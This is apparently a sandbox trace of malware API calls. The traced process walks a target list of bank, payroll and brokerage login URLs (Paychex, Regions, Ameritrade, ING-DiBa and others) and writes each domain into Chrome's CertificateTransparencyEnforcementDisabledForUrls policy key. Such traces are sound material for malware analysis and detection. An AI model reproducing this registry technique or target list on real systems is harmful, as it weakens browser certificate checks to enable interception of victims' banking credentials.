	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.509] strstr (_Str="*/rcrd/1556022570248208*", _SubStr="https://") returned 0x0
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191510
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191510 | out: hHeap=0x260000) returned 1
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.509] strstr (_Str="http*://*.walmart.com*", _SubStr="https://") returned 0x0
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191510
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191510 | out: hHeap=0x260000) returned 1
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.510] strstr (_Str="*/rcrd/1538497062765600*", _SubStr="https://") returned 0x0
	[0191.510] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.510] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191510
	[0191.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191510 | out: hHeap=0x260000) returned 1
	[0191.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.510] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.510] strstr (_Str="https://*runpayroll.adp.com/*", _SubStr="https://") returned="https://*runpayroll.adp.com/*"
	[0191.510] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.510] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.510] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.510] strstr (_Str="https://myapps.paychex.com/*_remote/*", _SubStr="https://") returned="https://myapps.paychex.com/*_remote/*"
	[0191.510] strncpy (in: _Dest=0x1dfa58, _Source="myapps.paychex.com/*_remote/*", _Count=0x12 | out: _Dest="myapps.paychex.comcom") returned="myapps.paychex.comcom"
	[0191.510] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.510] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2d4) returned 0x0
	[0191.510] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2dc, lpdwDisposition=0x0) returned 0x0
	[0191.510] RegSetValueExA (in: hKey=0x2dc, lpValueName="27", Reserved=0x0, dwType=0x1, lpData="myapps.paychex.com", cbData=0x12 | out: lpData="myapps.paychex.com") returned 0x0
	[0191.511] RegCloseKey (hKey=0x2dc) returned 0x0
	[0191.511] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.511] strstr (_Str="myapps.paychex.com", _SubStr="www.") returned 0x0
	[0191.511] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.511] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191538
	[0191.511] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191538 | out: hHeap=0x260000) returned 1
	[0191.511] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.511] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.511] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.511] strstr (_Str="*/rcrd/1543516849861476*", _SubStr="https://") returned 0x0
	[0191.511] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.511] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.511] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.511] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.511] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.511] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.511] strstr (_Str="*consorsbank.de/ev/Mein-Konto-und-Depot*", _SubStr="https://") returned 0x0
	[0191.511] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.511] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191538
	[0191.511] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191538 | out: hHeap=0x260000) returned 1
	[0191.511] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.511] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.511] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.511] strstr (_Str="*/rcrd/1549968469842314*", _SubStr="https://") returned 0x0
	[0191.511] strstr (_Str="https*ebay.com*", _SubStr="https://") returned 0x0
	[0191.512] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.512] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191538
	[0191.512] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191538 | out: hHeap=0x260000) returned 1
	[0191.512] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.512] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.512] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.512] strstr (_Str="*/rcrd/1553268997921074*", _SubStr="https://") returned 0x0
	[0191.512] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.512] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.512] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.512] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.512] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.512] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.512] strstr (_Str="https://vacu.onlinebank.com/AOP/PasswordDesktop.aspx", _SubStr="https://") returned="https://vacu.onlinebank.com/AOP/PasswordDesktop.aspx"
	[0191.512] strncpy (in: _Dest=0x1dfa58, _Source="vacu.onlinebank.com/AOP/PasswordDesktop.aspx", _Count=0x13 | out: _Dest="vacu.onlinebank.comom") returned="vacu.onlinebank.comom"
	[0191.512] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.512] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2d8) returned 0x0
	[0191.512] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2e0, lpdwDisposition=0x0) returned 0x0
	[0191.512] RegSetValueExA (in: hKey=0x2e0, lpValueName="28", Reserved=0x0, dwType=0x1, lpData="vacu.onlinebank.com", cbData=0x13 | out: lpData="vacu.onlinebank.com") returned 0x0
	[0191.513] RegCloseKey (hKey=0x2e0) returned 0x0
	[0191.513] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.513] strstr (_Str="vacu.onlinebank.com", _SubStr="www.") returned 0x0
	[0191.513] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.513] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.513] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.513] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.513] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.513] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.513] strstr (_Str="https://vacu.onlinebank.com/login.aspx*", _SubStr="https://") returned="https://vacu.onlinebank.com/login.aspx*"
	[0191.513] strncpy (in: _Dest=0x1dfa58, _Source="vacu.onlinebank.com/login.aspx*", _Count=0x13 | out: _Dest="vacu.onlinebank.com") returned="vacu.onlinebank.com"
	[0191.513] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.513] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2dc) returned 0x0
	[0191.513] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2e4, lpdwDisposition=0x0) returned 0x0
	[0191.514] RegSetValueExA (in: hKey=0x2e4, lpValueName="29", Reserved=0x0, dwType=0x1, lpData="securentrycorp.nbarizona.com", cbData=0x1c | out: lpData="securentrycorp.nbarizona.com") returned 0x0
	[0191.514] RegCloseKey (hKey=0x2e4) returned 0x0
	[0191.514] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.514] strstr (_Str="securentrycorp.nbarizona.com", _SubStr="www.") returned 0x0
	[0191.514] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.514] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191588
	[0191.514] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191588 | out: hHeap=0x260000) returned 1
	[0191.514] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.514] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.514] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.515] strstr (_Str="*/rcrd/1554226626854288*", _SubStr="https://") returned 0x0
	[0191.515] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.515] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.515] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.515] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.515] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.515] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.515] strstr (_Str="https://ola.cu1.org/Authentication/Username", _SubStr="https://") returned="https://ola.cu1.org/Authentication/Username"
	[0191.515] strncpy (in: _Dest=0x1dfa58, _Source="ola.cu1.org/Authentication/Username", _Count=0xb | out: _Dest="ola.cu1.orgorp.nbarizona.com") returned="ola.cu1.orgorp.nbarizona.com"
	[0191.515] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2e0) returned 0x0
	[0191.515] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2e8, lpdwDisposition=0x0) returned 0x0
	[0191.515] RegSetValueExA (in: hKey=0x2e8, lpValueName="30", Reserved=0x0, dwType=0x1, lpData="ola.cu1.org", cbData=0xb | out: lpData="ola.cu1.org") returned 0x0
	[0191.516] RegCloseKey (hKey=0x2e8) returned 0x0
	[0191.516] strstr (_Str="ola.cu1.org", _SubStr="www.") returned 0x0
	[0191.516] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.516] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191588
	[0191.516] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191588 | out: hHeap=0x260000) returned 1
	[0191.516] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.516] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.516] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.516] strstr (_Str="*/rcrd/1548766537307202*", _SubStr="https://") returned 0x0
	[0191.516] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.516] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.517] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.517] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.517] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.517] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.517] strstr (_Str="https://invest.ameritrade.com/grid/p/site", _SubStr="https://") returned="https://invest.ameritrade.com/grid/p/site"
	[0191.517] strncpy (in: _Dest=0x1dfa58, _Source="invest.ameritrade.com/grid/p/site", _Count=0x15 | out: _Dest="invest.ameritrade.comona.com") returned="invest.ameritrade.comona.com"
	[0191.517] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.517] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2e4) returned 0x0
	[0191.517] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2ec, lpdwDisposition=0x0) returned 0x0
	[0191.517] RegSetValueExA (in: hKey=0x2ec, lpValueName="31", Reserved=0x0, dwType=0x1, lpData="invest.ameritrade.com", cbData=0x15 | out: lpData="invest.ameritrade.com") returned 0x0
	[0191.518] RegCloseKey (hKey=0x2ec) returned 0x0
	[0191.518] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.518] strstr (_Str="invest.ameritrade.com", _SubStr="www.") returned 0x0
	[0191.518] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x1182270
	[0191.518] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x11821f8
	[0191.518] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11821f8 | out: hHeap=0x260000) returned 1
	[0191.518] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1182270 | out: hHeap=0x260000) returned 1
	[0191.518] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x1182270
	[0191.518] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1182270 | out: hHeap=0x260000) returned 1
	[0191.518] strstr (_Str="https://invest.ameritrade.com/cgi-bin/apps/u/SecurityChange?pagehandler=PHSecurityQuestionChange", _SubStr="https://") returned="https://invest.ameritrade.com/cgi-bin/apps/u/SecurityChange?pagehandler=PHSecurityQuestionChange"
	[0191.518] strncpy (in: _Dest=0x1dfa58, _Source="invest.ameritrade.com/cgi-bin/apps/u/SecurityChange?pagehandler=PHSecurityQuestionChange", _Count=0x15 | out: _Dest="invest.ameritrade.com") returned="invest.ameritrade.com"
	[0191.518] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.518] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2e8) returned 0x0
	[0191.518] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2f0, lpdwDisposition=0x0) returned 0x0
	[0191.518] RegSetValueExA (in: hKey=0x2f0, lpValueName="32", Reserved=0x0, dwType=0x1, lpData="www.choicehotels.com", cbData=0x14 | out: lpData="www.choicehotels.com") returned 0x0
	[0191.519] RegCloseKey (hKey=0x2f0) returned 0x0
	[0191.519] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.519] strstr (_Str="www.choicehotels.com", _SubStr="www.") returned="www.choicehotels.com"
	[0191.519] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.520] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2ec) returned 0x0
	[0191.520] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2f4, lpdwDisposition=0x0) returned 0x0
	[0191.520] RegSetValueExA (in: hKey=0x2f4, lpValueName="33", Reserved=0x0, dwType=0x1, lpData="choicehotels.com", cbData=0x10 | out: lpData="choicehotels.com") returned 0x0
	[0191.520] RegCloseKey (hKey=0x2f4) returned 0x0
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191600
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191600 | out: hHeap=0x260000) returned 1
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.521] strstr (_Str="*/rcrd/1548836629102091*", _SubStr="https://") returned 0x0
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191600
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191600 | out: hHeap=0x260000) returned 1
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.521] strstr (_Str="*cibng.ibanking-services.com*", _SubStr="https://") returned 0x0
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191600
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191600 | out: hHeap=0x260000) returned 1
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.521] strstr (_Str="*/rcrd/1550482874762402*", _SubStr="https://") returned 0x0
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.521] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.521] strstr (_Str="https://onepass.regions.com/oaam_server/oamLoginPage.jsp*", _SubStr="https://") returned="https://onepass.regions.com/oaam_server/oamLoginPage.jsp*"
	[0191.521] strncpy (in: _Dest=0x1dfa58, _Source="onepass.regions.com/oaam_server/oamLoginPage.jsp*", _Count=0x13 | out: _Dest="onepass.regions.comm") returned="onepass.regions.comm"
	[0191.521] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.521] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2f0) returned 0x0
	[0191.521] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2f8, lpdwDisposition=0x0) returned 0x0
	[0191.521] RegSetValueExA (in: hKey=0x2f8, lpValueName="34", Reserved=0x0, dwType=0x1, lpData="onepass.regions.com", cbData=0x13 | out: lpData="onepass.regions.com") returned 0x0
	[0191.523] RegCloseKey (hKey=0x2f8) returned 0x0
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.523] strstr (_Str="onepass.regions.com", _SubStr="www.") returned 0x0
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191628
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191628 | out: hHeap=0x260000) returned 1
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.523] strstr (_Str="*/rcrd/1543512054283274*", _SubStr="https://") returned 0x0
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.523] strstr (_Str="*banking.ing-diba.de/app/obligo?x*", _SubStr="https://") returned 0x0
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191628
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191628 | out: hHeap=0x260000) returned 1
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.523] strstr (_Str="*banking.ing-diba.de/app/login*", _SubStr="https://") returned 0x0
